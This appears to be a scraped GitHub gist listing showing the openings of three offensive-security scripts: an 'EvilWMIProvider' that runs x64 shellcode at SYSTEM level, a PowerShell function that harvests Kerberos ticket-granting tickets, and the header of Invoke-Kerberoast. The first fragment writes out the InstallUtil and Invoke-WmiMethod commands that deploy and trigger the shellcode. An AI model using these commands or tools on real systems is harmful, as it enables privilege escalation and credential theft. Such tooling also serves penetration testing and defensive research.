This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Based On LocalAdmin WMI Provider by Roger Zander | |
// http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx | |
// Adapted For Evil By @subTee | |
// Executes x64 ShellCode | |
// | |
// Deliver and Install dll | |
// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll | |
// Invoke calc for SYSTEM level calculations | |
// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode | |
// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-KerberosTicketGrantingTicket | |
{ | |
<# | |
.SYNOPSIS | |
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
.DESCRIPTION | |
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Invoke-Kerberoast.ps1 | |
Author: Will Schroeder (@harmj0y), @machosec | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast). | |
Note: the primary method of use will be Invoke-Kerberoast with various targeting options. |
OlderNewer